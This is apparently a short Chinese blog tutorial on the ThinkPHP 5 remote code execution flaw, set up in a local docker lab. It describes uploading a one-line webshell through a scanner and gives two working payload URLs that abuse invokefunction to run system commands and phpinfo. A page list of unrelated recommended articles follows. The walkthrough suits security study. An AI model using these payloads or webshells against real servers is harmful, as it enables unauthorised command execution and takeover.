常见框架漏洞—Thinkphp

1.搭建环境

cd /www/wwwroot/thinkphp/5-rce/

docker-compose up -d

2.访问我们搭建的环境

3.复制网站url到蓝鲸去测试漏洞

发现了两个漏洞

其中一个得到了一些信息

另一个漏洞我们在getshell中输入一句话木马,然后getshell,给我们生成了一个文件并上传到了文件,然后我们尝试访问

4.访问成功,然后我们传参

执行成功!

5.在url中输入:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

可以执行我们的系统命令

6.输入;

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

可以执行我们的代码

相关推荐
冬天vs不冷几秒前
SpringBoot条件注解全解析:核心作用与使用场景详解
java·spring boot·python
百锦再20 分钟前
Android Studio 实现自定义全局悬浮按钮
android·java·ide·app·android studio·安卓
百锦再23 分钟前
Android Studio 项目文件夹结构详解
android·java·ide·ios·app·android studio·idea
阿达King哥39 分钟前
Java虚拟机(JVM)平台无关?相关?
java·jvm
不是AI44 分钟前
【Java编程】【计算机视觉】一种简单的图片加/解密算法
java·算法·计算机视觉
森叶1 小时前
Java NIO & Java 虚拟线程(微线程)与 Go 协程的运行原理不同 为何Go 能在低配机器上承接10万 Websocket 协议连接
java·websocket·nio
程序员小蘇1 小时前
一天一个java知识点----Tomcat与Servlet
java·servlet·tomcat
Moso_Rx1 小时前
JavaEE——线程安全
java·安全·java-ee
岁岁岁平安2 小时前
SpringMVC入门学习总结(2025.04.16)
java·spring·java-ee·mvc·springmvc
00后程序员张2 小时前
iPhone相册导出到电脑的完整指南
websocket·网络协议·tcp/ip·http·网络安全·https·udp